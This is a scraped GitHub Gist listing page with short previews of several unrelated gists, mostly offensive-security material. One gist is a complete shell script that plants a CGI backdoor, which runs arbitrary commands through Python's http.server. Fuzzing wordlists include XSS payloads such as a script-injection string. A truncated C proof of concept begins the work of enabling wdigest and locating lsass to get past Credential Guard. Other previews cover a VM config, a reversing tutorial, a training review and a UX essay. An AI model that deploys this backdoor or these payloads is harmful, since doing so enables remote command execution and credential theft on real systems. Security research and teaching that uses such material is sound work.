https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA
MarkBaggett
/ gist:38dcff6a0975f148aa858e924d64c492
Created
November 14, 2020 18:22
http.server cgi backdoor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /tmp | |
| mkdir cgi-bin | |
| echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
| echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
| echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
| chmod +x ./cgi-bin/backdoor.cgi | |
| python -m http.server --cgi | |
caioluders
/ parameters_h1.txt
Created
November 11, 2020 07:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - | |
| . | |
| .. | |
| ... | |
| .... | |
| .AMRU | |
| .json | |
| .onion | |
| .txt | |
| 0 |
caioluders
/ subdomains_h1.txt
Created
November 11, 2020 07:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $$ | |
| $Any$ | |
| $shop$ | |
| $your-shop$ | |
| %20%44omain%20%3d | |
| %2f%2f%2fbing | |
| %60x | |
| %domain% | |
| %user% | |
| %your_domain% |
caioluders
/ paths_h1.txt
Last active
November 27, 2022 01:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-Cookie=test=test | |
| "--><svg | |
| "><script>prompt("exr")< | |
| $ | |
| $1 | |
| $a | |
| $account_id | |
| $code |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <domain xmlns:qemu="http://libvirt.org/schemas/domain/qemu/1.0" type="kvm"> | |
| <name>win10</name> | |
| <uuid>d2c97462-3a70-4afb-ab72-5916e8ac25ae</uuid> | |
| <title>Windows 10</title> | |
| <metadata> | |
| <libosinfo:libosinfo xmlns:libosinfo="http://libosinfo.org/xmlns/libvirt/domain/1.0"> | |
| <libosinfo:os id="http://microsoft.com/win/10"/> | |
| </libosinfo:libosinfo> | |
| </metadata> | |
| <memory unit="KiB">12582912</memory> |
N4kedTurtle
/ CredGuard_PoC
Created
August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <TlHelp32.h> | |
| #include <iostream> | |
| DWORD GetLsassPid() { | |
| PROCESSENTRY32 entry; | |
| entry.dwSize = sizeof(PROCESSENTRY32); |
muff-in
/ resources.md
Last active
May 3, 2025 15:45
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
lystena
/ venturing_into_the_dark.txt
Created
September 12, 2019 09:48
Venturing into the Dark - a review of Dark Side Ops 2: Adversary Simulation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =========================================================================== | |
| Venturing into the Dark - a review of Dark Side Ops 2: Adversary Simulation | |
| =========================================================================== | |
| --------------------------------------------------------------------------- | |
| Location: BlackHat Las Vegas | |
| Links: https://www.blackhat.com/us-19/training/schedule/#dark-side-ops | |
| ----adversary-simulation-14210 | |
| https://silentbreaksecurity.com/training/dark-side-ops-2-advers | |
| ary-simulation/ | |
| Trainers: Silent Break Security Team (team of 3) |
nstarke
/ 01-reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md
Last active
April 7, 2025 08:32
Reversing Cisco IOS Raw Binary Firmware Images with Ghidra
This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.
I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.
While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.
sleepyfox
/ 2019-07-25-users-hate-change.md
Last active
September 13, 2024 08:39
'Users hate change'
This week NN Group released a video by Jakob Nielsen in which he attempts to help designers deal with the problem of customers being resistant to their new site/product redesign. The argument goes thusly:
- Humans naturally resist change
- Your change is for the better
- Customers should just get used to it and stop complaining
There's slightly more to it than that, he caveats his argument with requiring you to have of course followed their best practices on product design, and allows for a period of customers being able to elect to continue to use the old site, although he says this is obviously only a temporary solution as you don't want to support both.